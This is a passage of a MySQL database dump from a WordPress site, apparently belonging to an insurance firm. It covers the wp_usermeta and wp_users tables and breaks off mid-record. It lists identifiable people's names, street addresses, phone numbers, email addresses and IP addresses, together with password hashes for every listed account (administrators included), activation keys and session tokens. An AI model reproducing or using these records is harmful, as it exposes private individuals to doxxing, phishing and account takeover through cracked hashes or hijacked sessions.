States'),(6729,207,'phone1','8062367216'),(6732,207,'wpmem_reg_ip','75.109.171.215'),(6735,207,'wpmem_reg_url','http://www.empireins.com/forms/'),(6737,209,'nickname','shraga'),(6740,209,'first_name','Shraga'),(6743,209,'last_name','Stein'),(6746,209,'description',''),(6749,209,'rich_editing','true'),(6752,209,'comment_shortcuts','false'),(6755,209,'admin_color','fresh'),(6758,209,'use_ssl','0'),(6761,209,'show_admin_bar_front','true'),(6764,209,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6767,209,'wp_user_level','0'),(6770,209,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6773,209,'addr1','160 Hewes St'),(6776,209,'addr2',''),(6779,209,'city','Brooklyn'),(6782,209,'thestate','NY'),(6785,209,'zip','11211'),(6788,209,'country','United states'),(6791,209,'phone1','845-662-5181'),(6794,209,'wpmem_reg_ip','24.213.178.195'),(6797,209,'wpmem_reg_url','http://www.empireins.com/register/'),(6800,209,'tos',''),(6803,209,'bgusername',''),(6806,209,'active','1'),(6809,209,'session_tokens','a:2:{s:64:\"6166e9526b5772456c758d5bdc13e7859825952b3b8e2b39db675adae76253f4\";a:4:{s:10:\"expiration\";i:1459516400;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1459343600;}s:64:\"15a60c955d7622af21570c52395ad97ebbdfe43cf34258e8737f849a301188d2\";a:4:{s:10:\"expiration\";i:1459516423;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1459343623;}}'),(6812,212,'nickname','avistern1'),(6815,212,'first_name','Avi'),(6818,212,'last_name','Stern'),(6821,212,'description',''),(6824,212,'rich_editing','true'),(6827,212,'comment_shortcuts','false'),(6830,212,'admin_color','fresh'),(6833,212,'use_ssl','0'),(6836,212,'show_admin_bar_front','true'),(6839,212,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6842,212,'wp_user_level','0'),(6845,212,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6848,212,'addr1','1274 49th STreet'),(6851,212,'addr2',''),(6854,212,'city','Brooklyn'),(6857,212,'thestate','NY'),(6860,212,'zip','11219'),(6863,212,'country','Kings'),(6866,212,'phone1','718-853-1010'),(6869,212,'wpmem_reg_ip','104.246.54.244'),(6872,212,'wpmem_reg_url','http://www.empireins.com/register/'),(6875,212,'tos',''),(6878,212,'bgusername',''),(6881,212,'active','1'),(6884,212,'session_tokens','a:1:{s:64:\"7fec420c767c7ed95fb343ade6d7d3ae6dea4e3287356afa488b607c3065d9b2\";a:4:{s:10:\"expiration\";i:1463501075;s:2:\"ip\";s:13:\"24.189.48.254\";s:2:\"ua\";s:61:\"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462291475;}}'),(6885,213,'nickname','wandaburrell'),(6888,213,'first_name','wanda'),(6891,213,'last_name','burrell'),(6894,213,'description',''),(6897,213,'rich_editing','true'),(6900,213,'comment_shortcuts','false'),(6903,213,'admin_color','fresh'),(6906,213,'use_ssl','0'),(6909,213,'show_admin_bar_front','true'),(6912,213,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6915,213,'wp_user_level','0'),(6918,213,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6921,213,'addr1','6527 bayway'),(6924,213,'addr2',''),(6927,213,'city','baytown'),(6930,213,'thestate','tx'),(6933,213,'zip','77520'),(6936,213,'country','us'),(6939,213,'phone1','2816830371'),(6942,213,'wpmem_reg_ip','66.87.120.5'),(6945,213,'wpmem_reg_url','http://www.empireins.com/forms/'),(6948,216,'nickname','wandaburrell1'),(6951,216,'first_name','wanda'),(6954,216,'last_name','burrell'),(6957,216,'description',''),(6960,216,'rich_editing','true'),(6963,216,'comment_shortcuts','false'),(6966,216,'admin_color','fresh'),(6969,216,'use_ssl','0'),(6972,216,'show_admin_bar_front','true'),(6975,216,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6978,216,'wp_user_level','0'),(6981,216,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6984,216,'addr1','6527 bayway'),(6987,216,'addr2',''),(6990,216,'city','baytown'),(6993,216,'thestate','tx'),(6996,216,'zip','77520'),(6999,216,'country','us'),(7002,216,'phone1','2816830371'),(7005,216,'wpmem_reg_ip','66.87.120.5'),(7008,216,'wpmem_reg_url','http://www.empireins.com/forms/'),(7010,218,'nickname','hglanzer'),(7013,218,'first_name','Hirsch'),(7016,218,'last_name','Glanzer'),(7019,218,'description',''),(7022,218,'rich_editing','true'),(7025,218,'comment_shortcuts','false'),(7028,218,'admin_color','fresh'),(7031,218,'use_ssl','0'),(7034,218,'show_admin_bar_front','true'),(7037,218,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(7040,218,'wp_user_level','0'),(7043,218,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(7046,218,'addr1','1285 52nd Street'),(7049,218,'addr2',''),(7052,218,'city','Brooklyn'),(7055,218,'thestate','NY'),(7058,218,'zip','11219'),(7061,218,'country','US'),(7064,218,'phone1','718 972 0275'),(7067,218,'wpmem_reg_ip','24.146.252.22'),(7070,218,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(7073,218,'tos',''),(7076,218,'bgusername',''),(7079,218,'active','1'),(7080,218,'session_tokens','a:1:{s:64:\"d67f7bfb55109ef79853343a7f984f0633d6366adcf3d410ede66f6e9fc35782\";a:4:{s:10:\"expiration\";i:1460128817;s:2:\"ip\";s:13:\"24.146.252.22\";s:2:\"ua\";s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)\";s:5:\"login\";i:1459956017;}}'),(7082,16,'session_tokens','a:1:{s:64:\"324c937b39d4786c026a4ab1ce393490963e6dee63be518668e9688f3f6bd977\";a:4:{s:10:\"expiration\";i:1463091356;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462918556;}}'),(7083,218,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:961303;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(7086,219,'nickname','margomacik'),(7089,219,'first_name','Margo'),(7092,219,'last_name','Macik'),(7095,219,'description',''),(7098,219,'rich_editing','true'),(7101,219,'comment_shortcuts','false'),(7104,219,'admin_color','fresh'),(7107,219,'use_ssl','0'),(7110,219,'show_admin_bar_front','true'),(7113,219,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(7116,219,'wp_user_level','0'),(7119,219,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(7122,219,'addr1','1216 Macarthur'),(7125,219,'addr2',''),(7128,219,'city','Rosenberg'),(7131,219,'thestate','tx'),(7134,219,'zip','77471'),(7137,219,'country','USA'),(7140,219,'phone1','8328002347'),(7143,219,'wpmem_reg_ip','98.197.149.231'),(7146,219,'wpmem_reg_url','http://www.empireins.com/register/'),(7149,222,'nickname','EksteinFinancial'),(7152,222,'first_name','Goldy'),(7155,222,'last_name','Lerner'),(7158,222,'description',''),(7161,222,'rich_editing','true'),(7164,222,'comment_shortcuts','false'),(7167,222,'admin_color','fresh'),(7170,222,'use_ssl','0'),(7173,222,'show_admin_bar_front','true'),(7176,222,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(7179,222,'wp_user_level','0'),(7182,222,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(7185,222,'addr1','134 Broadway suite 601'),(7188,222,'addr2',''),(7191,222,'city','Brooklyn'),(7194,222,'thestate','NY'),(7197,222,'zip','11249'),(7200,222,'country','USA'),(7203,222,'phone1','1718-599-2800'),(7206,222,'wpmem_reg_ip','208.125.14.78'),(7209,222,'wpmem_reg_url','http://www.empireins.com/register/'),(7211,222,'tos',''),(7214,222,'bgusername',''),(7217,222,'active','1'),(7220,222,'session_tokens','a:3:{s:64:\"c2215632df086937560a8de099a380c1b219ae7433ce73639dbad0a6c655be84\";a:4:{s:10:\"expiration\";i:1460647131;s:2:\"ip\";s:13:\"208.125.14.78\";s:2:\"ua\";s:61:\"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1460474331;}s:64:\"ef429facdf2d4cdd573ef8685f6c6a1cfd1314f9e08ff6e4063caa56fa7e9209\";a:4:{s:10:\"expiration\";i:1460647150;s:2:\"ip\";s:13:\"208.125.14.78\";s:2:\"ua\";s:61:\"Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1460474350;}s:64:\"9a5d223bf3671ca66342ab89da29f6742aa113286d136c9ca7ead9426930dd33\";a:4:{s:10:\"expiration\";i:1460651566;s:2:\"ip\";s:13:\"208.125.14.78\";s:2:\"ua\";s:71:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/7.0)\";s:5:\"login\";i:1460478766;}}'),(7221,1,'session_tokens','a:1:{s:64:\"2dc8978e58050b5a8759ebbc8bed8628e78040969772fac882d105ee9c6f1a00\";a:4:{s:10:\"expiration\";i:1463169237;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36\";s:5:\"login\";i:1462996437;}}'),(7224,16,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:33478;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(7227,16,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:33478;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(7230,225,'nickname','Melissa83d'),(7233,225,'first_name','Melissa'),(7236,225,'last_name','Davis'),(7239,225,'description',''),(7242,225,'rich_editing','true'),(7245,225,'comment_shortcuts','false'),(7248,225,'admin_color','fresh'),(7251,225,'use_ssl','0'),(7254,225,'show_admin_bar_front','true'),(7257,225,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(7260,225,'wp_user_level','0'),(7263,225,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(7266,225,'addr1','1001 stewart ct'),(7269,225,'addr2',''),(7272,225,'city','Azle'),(7275,225,'thestate','Texas'),(7278,225,'zip','76020'),(7281,225,'country','United States'),(7284,225,'phone1','2294622131'),(7287,225,'wpmem_reg_ip','172.58.105.77'),(7290,225,'wpmem_reg_url','http://www.empireins.com/case-status/'),(7292,227,'nickname','bartcollard@yahoo.com'),(7295,227,'first_name','Roy'),(7298,227,'last_name','Collard'),(7301,227,'description',''),(7304,227,'rich_editing','true'),(7307,227,'comment_shortcuts','false'),(7310,227,'admin_color','fresh'),(7313,227,'use_ssl','0'),(7316,227,'show_admin_bar_front','true'),(7319,227,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(7322,227,'wp_user_level','0'),(7325,227,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(7328,227,'addr1','604 Plum St'),(7331,227,'addr2',''),(7334,227,'city','Commerce'),(7337,227,'thestate','Texas'),(7340,227,'zip','75428'),(7343,227,'country','Hunt'),(7346,227,'phone1','214-875-6033'),(7349,227,'wpmem_reg_ip','76.184.168.34'),(7352,227,'wpmem_reg_url','https://www.empireins.com/forms/'); /*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_users` -- DROP TABLE IF EXISTS `wp_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wp_users` ( `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_login` varchar(60) NOT NULL DEFAULT '', `user_pass` varchar(64) NOT NULL DEFAULT '', `user_nicename` varchar(50) NOT NULL DEFAULT '', `user_email` varchar(100) NOT NULL DEFAULT '', `user_url` varchar(100) NOT NULL DEFAULT '', `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `user_activation_key` varchar(60) NOT NULL DEFAULT '', `user_status` int(11) NOT NULL DEFAULT '0', `display_name` varchar(250) NOT NULL DEFAULT '', PRIMARY KEY (`ID`), KEY `user_login_key` (`user_login`), KEY `user_nicename` (`user_nicename`) ) ENGINE=InnoDB AUTO_INCREMENT=228 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wp_users` -- LOCK TABLES `wp_users` WRITE; /*!40000 ALTER TABLE `wp_users` DISABLE KEYS */; INSERT INTO `wp_users` VALUES (1,'admin','$P$BZKUqxGKe2o9R3RM1g9rFbB1AEwCo0/','admin','eib@universalnyc.com','','2014-04-21 21:10:16','$P$BnIzw4nte9jAPmG1ps1bVgIHhyyHV00',0,'admin'),(7,'RosettaCastellan','$P$BV1o0bxwDbQ1wF7kE3ktStV9QLXTLO.','rosettacastellan','mgsberylqf@yahoo.com','','2015-08-15 00:52:37','',0,'RosettaCastellan'),(10,'admin2','$P$BrOAABl9buSv.4N40Y/wFA2XjzguyI0','admin2','eib2@universalnyc.com','','2015-12-11 09:41:24','',0,'admin2'),(13,'jzicher','$P$B0d7N6CWRoz9qh6F2Iyg59Hww6nerZ.','jzicher','jzicher@gmail.com','','2015-12-30 16:16:34','',0,'jzicher'),(14,'jetset18','$P$BI.gOANMXVgjFJy/40HsPeThRKFela0','jetset18','David@coachstern.com','','2015-12-30 16:27:58','',0,'jetset18'),(16,'cheskelb','$P$BZSTO/A60gc/Td5oz8jlcAY1NdUgd6.','cheskelb','cheskel@empireins.com','','2015-12-30 19:35:36','$P$BCTfel4a.RGdSd5gM2qYi8NBZDwWlo/',0,'cheskelb'),(22,'execut1ve','$P$BVmuJxMoxtQapm/cexB9yIODeyoIGz0','execut1ve','nl@executive-one.com','','2015-12-30 21:40:47','',0,'execut1ve'),(23,'Uniart','$P$BMVb6LRuqsHLRpaCUR3rYCQVCO.ZyA.','uniart','sam@universalnyc.com','','2015-12-30 23:02:55','',0,'Uniart'),(25,'syfriedman','$P$BE8MEsUoZT6YnMDd9nJBgmcnvU644u1','syfriedman','samyfriedman@gmail.com','','2015-12-31 14:31:01','',0,'syfriedman'),(28,'perilane','$P$B0m6sMeX3UJm8PqFM7/hJn2V4O4fPW1','perilane','peri@apisproductions.com','','2016-01-04 15:53:37','',0,'peri lane'),(31,'azelcer','$P$BVzrqgKnqA9EW9hQuiZaNd7Mk3MgdQ.','azelcer','aronzelcer@gmail.com','','2016-01-04 17:19:45','',0,'azelcer'),(34,'asimcha','$P$BZQyEospf80kQ03/8rPUydDkMv0Fp91','asimcha','abrahammo@gmail.com','','2016-01-04 19:05:53','',0,'asimcha'),(35,'jaynylic1','$P$BhoRUWV3M6PRn2WjUeodM1hCl3KTEA0','jaynylic1','josephspira@gmail.com','','2016-01-04 20:17:11','',0,'jaynylic1'),(37,'dbraver','$P$BmYJDQwRu6/nxTc7uE7Siy1XsT6PMN1','dbraver','david@empireins.com','','2016-01-04 23:17:23','',0,'dbraver'),(38,'Nkadin','$P$BJrHmDIueoQqlxfkhd6R4/CX9whibH/','nkadin','Nakadin@Gmail.com','','2016-01-04 23:56:16','',0,'Nkadin'),(40,'ipipeadmin','$P$BxJgV5uMav3YAvNGitxmY/aht0Wc1W1','ipipeadmin','admin@ipipeline.com','','2016-01-05 15:07:38','',0,'ipipeline admin'),(43,'ipipelineadmin','$P$BKfyiWadEtCghvVF5xAPPor7NZoh6j.','ipipelineadmin','info@apisproductions.com','','2016-01-05 15:20:20','',0,'ipipe admin'),(46,'peritest','$P$BW2ZmoMl7kAp5JJtzbRy3MyLtlP06U/','peritest','support@apisproductions.com','','2016-01-05 18:32:53','',0,'hgfirst hglast'),(48,'yepstein22','$P$BQuDwj9nQBAhHN0BoyAg4YJj7LKak60','yepstein22','jepstein845@gmail.com','','2016-01-05 21:35:43','',0,'yepstein22'),(51,'abrahammermelstein','$P$BGgZgRx/LUAftj2qF5Tu1jj0x5pO040','abrahammermelstein','enaxm@glic.com','','2016-01-05 22:45:53','',0,'Abraham Mermelstein'),(54,'jreich321','$P$BuKOrobOlbSEBIFrJJks59eCbo2086/','jreich321','jay@usahomefinancial.com','','2016-01-05 23:26:57','',0,'jreich321'),(57,'akepecs','$P$BoRBUrtSqXuWzC2UxzsniiPCQYuokE/','akepecs','abraham@kepecsfinancial.com','','2016-01-06 21:58:35','',0,'akepecs'),(58,'throop0715','$P$BXJeA8rnZ8K/QlgJe.5Lth839.xk4G/','throop0715','aaron_grosz@bfgny.com','','2016-01-07 02:13:06','',2,'throop0715'),(59,'DavidGlick','$P$Be8cIK20cuM4BAAgf0jnObmZ4ztp3d.','davidglick','mrdavidglick@gmail.com','','2016-01-08 17:45:42','',0,'DavidGlick'),(61,'fntime55','$P$B18EBPM0efD8C/ATlNfa6KLOq4Y0310','fntime55','mottynj@yahoo.com','','2016-01-10 18:02:58','',0,'fntime55'),(62,'gsteinmetz10235','$P$BTdvYeozBvWH/tLOrbRCkzT1N8U/G60','gsteinmetz10235','chaimbv@gmail.com','','2016-01-10 18:15:34','',0,'gsteinmetz10235'),(64,'gsteinmetz12486','$P$BZFS2sVk65bjcBjhu485iUr45QCvBt/','gsteinmetz12486','Roeblingst@yahoo.com','','2016-01-10 18:18:56','',0,'gsteinmetz12486'),(67,'Shmuli','$P$B1HbsW2y3Ham8sKtrSbsPWHzUzP/ey.','shmuli','shmuel_wolvovsky@bfgny.com','','2016-01-11 15:08:37','',0,'Shmuli'),(70,'fully10952','$P$BY1Azbz4nLUXPnyUGUZ.A0PxoChPgj.','fully10952','raphaellife1@gmail.com','','2016-01-11 17:25:12','',0,'fully10952'),(73,'yitzchok','$P$B0TVcbGy5kxtKn8Ve.1lMKxphXFYVM1','yitzchok','yl@lebaum.com','','2016-01-11 19:18:42','',0,'yitzchok'),(74,'Isaacd','$P$BzupZZ6YEsnahf6tULYvcT1m9TK3l2/','isaacd','deutsch.isaac@gmail.com','','2016-01-11 20:31:44','',0,'Isaacd'),(76,'mfrankel','$P$B5iSQAfmE1M2AwfrGy9a7gPGtrPB.C/','mfrankel','mendelfrankel@gmail.com','','2016-01-11 23:18:34','',0,'mfrankel'),(79,'sadolf','$P$Bm9g6gDd2ZVvIKd/aAsdFfAurwTbOz/','sadolf','sc_adolf@verizon.net','','2016-01-12 17:20:47','',0,'sadolf'),(82,'liflan1','$P$BJJMSoDqL4bSOJlaIn0cPgRi9kFrU41','liflan1','liflan@aol.com','','2016-01-13 18:40:17','',0,'liflan1'),(84,'bassul70','$P$BlR7v8Fl.fDvG18ro7FDs6bLifRRda0','bassul70','joseph_bassul@bfgny.com','','2016-01-13 20:00:05','',0,'bassul70'),(85,'jojo','$P$BAMSqKUpsPjqyXWSyuntdCfA.8EE3.1','jojo','yosef.portal@gmail.com','','2016-01-13 20:12:23','',0,'jojo'),(88,'ABRAVER@KENTCO.COM','$P$BwwZBdXswN22dvHM60NKlGN3N.CzKI0','abraverkentco-com','aronrav@gmail.com','','2016-01-13 21:07:34','',0,'ABRAVER@KENTCO.COM'),(91,'mittelmanh','$P$BUi0ZaZ3izRhcaghCBoKB16ihxazpH/','mittelmanh','hershymittelman@gmail.com','','2016-01-15 01:31:05','',0,'mittelmanh'),(97,'joelgoldberger','$P$B.SE73VDykbN98NTWQ4yospYuo/es40','joelgoldberger','jgoldberger@simkowitzco.com','','2016-01-15 16:47:22','',0,'joelgoldberger'),(99,'bengross','$P$BmnFrWROiU2ZeLWsp6Tsvr6HzXZDjj1','bengross','bgrossins@gmail.com','','2016-01-18 02:58:04','',0,'bengross'),(100,'enzxw','$P$B/TbEgTLkUAVNJ4aysOtZyzfHdHe71.','enzxw','zev@walterins.com','','2016-01-18 16:19:29','',0,'enzxw'),(102,'Biny1280','$P$BrSw7y4l7MRdBvalk/jUb5RcTfUWXa.','biny1280','yocheved_rotbard@bfgny.com','','2016-01-18 17:50:38','',0,'Biny1280'),(105,'Lmschwartz@bfgny.com','$P$BhRdPQP1GzofJzhXfaUvh3QntcZU6d.','lmschwartzbfgny-com','Lmschwartz@bfgny.com','','2016-01-18 21:55:37','',0,'Lmschwartz@bfgny.com'),(106,'joel32','$P$B4gJjw2tVLH21o5xUE8jF8g3PRQS4D.','joel32','yfriedman.ins@gmail.com','','2016-01-19 17:54:52','',0,'joel32'),(109,'kestenbaum','$P$B.Bjskoz7WZf96BVP9wnjPIJP6PyZB/','kestenbaum','chaimkestenbaum@gmail.com','','2016-01-19 19:52:17','',0,'kestenbaum'),(112,'hkellner','$P$Bch1.cUbounzpYChApDm17bs85hfZH/','hkellner','henry@reliablebrokerage.com','','2016-01-20 17:31:49','',0,'hkellner'),(114,'entxg','$P$BHkruO/wmub.6L1ZUDBrOjLtL9zq7R.','entxg','tovia_gross@bfgny.com','','2016-01-20 18:53:44','',0,'entxg'),(117,'madler','$P$Br2olzCM3stWC9OlIfW1CiZduWzc6h/','madler','adlerfinancials@yahoo.com','','2016-01-20 20:07:41','',0,'madler'),(120,'SimkowitzCo','$P$BSwHjhyt2wKpUIAsIunjSvoI/Eikm20','simkowitzco','cweinberger@simkowitzco.com','','2016-01-21 16:33:42','',0,'David Simkowitz'),(123,'aefriend','$P$BLso7/.uGnxKmZ8r.62PhRquKKhFVu0','aefriend','sales@weberandsons.com','','2016-01-21 18:20:26','',0,'aefriend'),(126,'hermankatz','$P$BiDmdMIKYatcnRlnZLbZUK2tdCNDzj.','hermankatz','hermankatz@ft.newyorklife.com','','2016-01-21 18:26:14','',0,'hermankatz'),(129,'Chaya','$P$BnvR3N9hiFiNkaHANAxXuxZDxgyZnQ1','chaya','Chaya@empireins.com','','2016-01-21 18:26:30','',0,'Chaya'),(130,'Jschwinder','$P$BL5X2JeWZRC83xfhqndbS26yZaURef.','jschwinder','jschwinder@thejnet.com','','2016-01-25 20:31:35','',0,'Joseph Schwinder'),(132,'roisy','$P$BwOJuzTEIrmk7pNEK2.uthFYBYafd9/','roisy','roisy@empireins.com','','2016-01-25 21:03:23','',0,'roisy'),(133,'wlandau','$P$BRZd4I7snGpcr887tjIkEhcE0tYpGj1','wlandau','wolflandau@gmail.com','','2016-01-26 01:08:54','',0,'wlandau'),(134,'shlomobass','$P$Bj2YQcM9XXLjt8KIJUoq8E3sgv/P84/','shlomobass','shlomobass@hotmail.com','','2016-01-27 17:43:41','',0,'shlomobass'),(135,'PQjSypMRYewznoRCuU','$P$BldzhI/elB9Y1TwZZ7FNZ2XFMIRQhG1','pqjsypmryewznorcuu','mark357177@hotmail.com','','2016-01-30 21:32:58','',0,'PQjSypMRYewznoRCuU'),(137,'ykaufman','$P$BGi71HZoOd26SQ5OQNeS5iezKSOZur1','ykaufman','yoel@financialdreamsny.com','','2016-01-31 20:59:43','',0,'ykaufman'),(138,'engelsruly','$P$BSy5HuRJLfVAhan.9IcnW.ZFHb6qCT.','engelsruly','engelfinancials@gmail.com','','2016-02-01 17:11:35','',0,'engelsruly'),(140,'freundjoel','$P$BSUgAj2UfKC.i3KYLwfTYSmS.TMUj9.','freundjoel','jfreundins@gmail.com','','2016-02-01 18:47:16','',0,'freundjoel'),(141,'hershele','$P$BlBWa1d8HuiWbq.DDeb.FvblD4nV/X1','hershele','lazarbrody@gmail.com','','2016-02-02 02:58:55','',0,'hershele'),(143,'Sgrunstein','$P$B81EY/fh5FuMUVezpmHe9zezjtOXI20','sgrunstein','insurance@bestcpa.net','','2016-02-02 06:23:25','',0,'Sgrunstein'),(144,'lweinberger','$P$Bb4F79cIJAfo7YMP6bVCEuJIFHDyTO/','lweinberger','sales@aaasettlements.com','','2016-02-03 04:11:22','',0,'lweinberger'),(145,'isaacjacob','$P$BNkoM3NhfT6EOmc9t5LnxsALkzPELS.','isaacjacob','isaacjacob2@gmail.com','','2016-02-03 18:40:34','',0,'isaacjacob'),(147,'joel10950','$P$Bsrr4gsJ5uJ3LNmcgtNiz/OKjQVTax1','joel10950','joel.lebovits@gmail.com','','2016-02-03 18:43:07','',0,'joel10950'),(150,'DonaldPync','$P$BgGmLbg4t7bEZ0ja/bfJso4gXUmabj1','donaldpync','geraldbime@gmail.com','','2016-02-07 00:57:58','',0,'DonaldPync'),(153,'joseffried','$P$BLd7Qz8/LHjim10q9gCRfaji5vQHVi/','joseffried','JOSEF@FRIEDASSOCIATES.COM','','2016-02-07 21:28:02','',0,'joseffried'),(156,'zlberger','$P$B4JfFSNtvY4JVBGVFp4tWhdurNpF7q0','zlberger','zlberger@optimum.net','','2016-02-09 17:27:58','',0,'zlberger'),(159,'Wperl','$P$B6wddEd7PFFhmW/vt5g3aZPxNcYzXN0','wperl','Wolf_perl@universalplanning.com','','2016-02-09 20:14:41','',0,'Wperl'),(161,'WilliamPt','$P$BSeL7Nux9HF0hfiTVNbOzsuRWmpR9S1','williampt','geraldbime@outlook.com','','2016-02-11 00:05:09','',0,'WilliamPt'),(164,'zenwirth','$P$BKMkkhzl.rK35XwQMeWbO/IQoeWbCA.','zenwirth','benzion_weinfeld@bfgny.com','','2016-02-11 20:11:17','',0,'zenwirth'),(167,'Pollak','$P$BAiLxXmT3gz/Baz8xqn388TfpFAvwH0','pollak','elyapollak1@gmail.com','','2016-02-15 18:50:29','',0,'Pollak'),(170,'yoelnyl','$P$BgUvMeEUr704n/h2t/GqBfDF/q7Co6.','yoelnyl','yfelberbaum@bfgny.com','','2016-02-16 16:58:34','',0,'yoelnyl'),(171,'Schwartz1907','$P$BLLzoCGPf0QK2ODC0Iqc2zPEWi2Vvu0','schwartz1907','Schwartz1907@gmail.com','','2016-02-17 00:40:59','',0,'Schwartz1907'),(174,'Chaim Babad','$P$B4Eto7lAkW5bVZHI9wPqEodEHgqAOY1','chaim-babad','CHAIM_BABAD@BABADASSOCIATES.COM','','2016-02-17 21:34:46','',0,'Chaim Babad'),(175,'samekstein','$P$B1Ql3BFPLN/PmZRjCv4XPlPVxAM3PQ1','samekstein','s.e.stein@thejnet.com','','2016-02-21 20:01:02','',0,'samekstein'),(178,'gkruger38','$P$Biy1TG/OuR1By8cEoqbo/IWdZQovZW/','gkruger38','gkruger38@gmail.com','','2016-02-23 01:15:24','',0,'gkruger38'),(179,'neal5414d','$P$BxC/osgNG5rKJv11gmM28K/evBMuGR/','neal5414d','neal541@gmail.com','','2016-02-23 21:19:04','',0,'neal5414d'),(180,'jaynylic','$P$ByZEePsFCEV2gtMNyGx5pvZAefB9oj1','jaynylic','josephspira.@gmail.com','','2016-02-23 21:33:11','',0,'jaynylic'),(183,'jspira','$P$B4vx3mfeaXRrM0t7047SWEJxeRbT0K/','jspira','josephspira..@gmail.com','','2016-02-23 21:34:14','',0,'jspira'),(185,'jspira1','$P$BVltT.6tDsjxu01Fv1eWotfe09rzPA0','jspira1','jspira@juno.com','','2016-02-23 21:52:44','',0,'jspira1'),(186,'benzion banash','$P$Bcj7ZMRXSq4CeP4LheevXsnJAUwg.r0','benzion-banash','b7125363@gmail.com','','2016-02-24 19:42:25','',0,'benzion banash'),(188,'levitauber','$P$BV/AgXsXimsEiLzOzEo9aP4IRqPy9i1','levitauber','levitauber@gmail.com','','2016-02-24 23:10:25','',0,'levitauber'),(190,'imayer','$P$BGcIoGfiZ.5noS60GgQUnYY0Bf2vRc1','imayer','gitty@isaacinsurance.net','','2016-03-02 17:15:30','',0,'imayer'),(193,'jsimcha','$P$Baj2gLhuSF4w10TjsQq6p9n.KmMI0N1','jsimcha','jacksimca@usa.net','','2016-03-08 16:16:03','',0,'jsimcha'),(194,'cgancz','$P$BVpxztuc5UAPnuESS6u7ih96NSC9p91','cgancz','chaimgancz@gmail.com','','2016-03-14 20:56:48','',0,'cgancz'),(195,'yoel shtesl','$P$BnlGb9/H6dCDzhsxY31..1RfQ2HvTe/','yoel-shtesl','shtesl.ins@gmail.com','','2016-03-17 14:02:35','',0,'yoel shtesl'),(198,'avi','$P$BDqdcZoUnrObK92DeXM33stiuysbOd.','avi','avi_stern@glic.com','','2016-03-17 